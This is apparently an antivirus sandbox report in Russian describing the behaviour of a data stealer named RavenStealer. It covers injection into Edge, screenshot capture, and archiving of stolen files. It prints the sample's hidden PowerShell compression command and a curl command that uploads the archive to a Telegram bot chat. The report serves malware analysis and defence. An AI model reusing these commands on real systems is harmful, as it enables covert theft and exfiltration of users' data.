Техническая информация
Вредоносные функции
Внедряет код в
следующие пользовательские процессы:
- msedge.exe
Изменения в файловой системе
Создает следующие файлы
- %ProgramFiles(x86)%\microsoft\edge\application\89.0.774.68\chrome_debug.log
- %LOCALAPPDATA%\ravenstealer\screenshot.png
- %TEMP%\user_ravenstealer.zip
- nul
Удаляет файлы, которые сам же создал
- %TEMP%\user_ravenstealer.zip
Сетевая активность
Подключается к
- 'mo#####.map.fastly.net':443
- 'ap#.##legram.org':443
TCP
Запросы HTTP GET
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?1d##############
Другие
- 'ap#.##legram.org':443
UDP
- DNS ASK mo#####.map.fastly.net
- DNS ASK ap#.##legram.org
Другое
Запускает на исполнение
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu --disable-software-rasterizer --no-sandbox (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { Compress-Archive -Path '%LOCALAPPDATA%\RavenStealer\*' -DestinationPath '%TEMP%\user_RavenStealer.zip' -Force -ErrorAction SilentlyCo... (со скрытым окном)
- '<SYSTEM32>\curl.exe' -s -o nul -F "chat_id=5770570675" -F "document=@%TEMP%\user_RavenStealer.zip" -F "caption=RavenStealer Report for user@Windows 8\n\nNo significant data found on this system." https://api.telegr... (со скрытым окном)
